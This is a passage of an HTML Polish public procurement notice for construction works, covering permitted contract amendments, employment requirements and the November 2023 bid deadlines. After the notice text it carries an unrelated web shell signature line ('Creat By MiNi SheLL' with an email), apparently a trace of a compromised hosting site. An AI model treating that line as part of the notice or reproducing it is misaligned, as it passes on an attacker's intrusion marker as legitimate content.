poprzedzającym, została wybrana, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonywania zmian postanowień niniejszej umowy, w zakresie: <br/>1) zmiany wysokości wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług oraz podatku akcyzowego, z tym zastrzeżeniem, że wartość netto wynagrodzenia wykonawcy nie zmieni się, a wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów; <br/>2) zmiany zakresu/sposobu realizacji świadczenia, w przypadku odmiennych od przyjętych w dokumentacji projektowej warunków związanych z istnieniem niezinwentaryzowanych sieci, instalacji, urządzeń lub obiektów budowlanych skutkujących niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych lub materiałowych, bądź wycofania z produkcji materiałów przyjętych w dokumentacji; <br/>3) zmiany terminu realizacji, w przypadku działania organów administracji lub gestorów sieci związanego z przekroczeniem określonych przez prawo terminów wydawania wymaganych w związku z realizacją przedmiotowego zamówienia, decyzji, zezwoleń, uzgodnień itp. <br/>4) wydanie decyzji administracyjnej przez organ nadzoru budowlanego lub ochrony środowiska o wstrzymaniu robót w wyniku interwencji obywatela lub organizacji społecznej; <br/>5) wystąpienie nieprzewidzianych zjawisk atmosferycznych (np.: wichury, ulewy, śnieżyce, gradobicie) mogących spowodować zniszczenie robót lub konieczność wstrzymania robót ze względu na zachowanie reżimów technologicznych (temperatura, wilgotność); <br/>6) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem; <br/>7) zaistnienie sytuacji pozwalającej na obniżenie kosztów realizacji zamówienia (np. zmniejszenie zakresu robót lub czynności, zastosowania alternatywnych rozwiązań technologicznych); <br/>8) zaistnienie konieczności wykonania robót zamiennych. <br/>2. Podstawą dokonania zmian, o których mowa w ust. 1 pkt 3 będzie potwierdzenie w dokumentacji budowy, przez inspektora nadzoru, wystąpienia opisanych okoliczności uzasadniających wstrzymanie robót, z określeniem okresu wstrzymania robót wpływającego na zmianę terminu i sporządzenie protokołu konieczności – zatwierdzonego przez zamawiającego. <br/>3. Zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-09 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com